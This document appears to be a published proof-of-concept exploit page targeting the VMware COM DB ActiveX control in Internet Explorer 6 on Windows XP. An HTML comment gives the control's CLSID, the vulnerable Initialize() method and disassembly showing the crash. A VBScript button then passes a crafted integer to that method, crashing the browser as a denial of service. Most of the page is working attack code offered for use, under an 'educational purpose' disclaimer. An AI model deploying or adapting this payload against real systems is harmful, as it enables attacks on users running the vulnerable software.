|
<html>
<!--
<< Bug discovered by cN4phux >> a small GHH from DZ.
# VMware COM DB ActiveX Remote Buffer Overflow Exploit
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
# Tested on Windows XP Professional SP2, with Internet Explorer 6.x.x
CLSID = '8F5DEA70-D1E7-4237-BCDB-D3D56ED3E6FA'
progID = "VMDBCOMLib.VMList"
member_name = "Initialize"
Target_File = "C:\Program Files\VMware\VMware Server\vmdbCOM.dll"
#
# Function that is vulnerable with a DOS IE . . Initialize()
# Block Disassembly:
111AE667 RETN
111AE668 MOV EAX,[EBP+C]
111AE66B PUSH EBX
111AE66C PUSH EDI
111AE66D PUSH EAX
111AE66E MOV [ESI+4],EAX
111AE671 CALL [EAX] <-------------------- it will be crash here . . .<
111AE673 MOV EBX,[EBP+8]
111AE676 PUSH 1133D9D0
111AE67B PUSH EBX
111AE67C CALL 111AF800
111AE681 MOV EDI,EAX
111AE683 ADD ESP,C
111AE686 TEST EDI,EDI
111AE688 JL 111AE731
Exception Code: ACCESS_VIOLATION
Disasm: 111AE671 CALL [EAX] (vmapplib.DLL)
# Greetz to friend's : Blub, Zigma, Heurs, djug & etc . . .
-->
<object classid='clsid:8F5DEA70-D1E7-4237-BCDB-D3D56ED3E6FA'
id='VMware_function'></object>
<input language=VBScript onclick=Buffer_Act() type=button value='Click here
to start the crash DOS'>
<script language='vbscript'>
Sub Buffer_Act
buff_1 = -2147483647
buff_2 = 1
buff_3 = unescape("%90")
VMware_function.Initialize buff_1, buff_2
End Sub
</script>
</html>
|
推荐
评论(0条)
